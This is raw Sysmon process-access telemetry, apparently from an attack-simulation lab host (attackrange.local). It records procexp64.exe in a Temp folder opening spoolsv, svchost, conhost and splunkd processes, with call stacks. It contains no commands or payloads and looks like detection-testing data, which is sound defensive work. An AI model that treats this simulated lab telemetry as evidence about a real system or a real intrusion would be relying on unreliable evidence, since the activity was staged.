15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 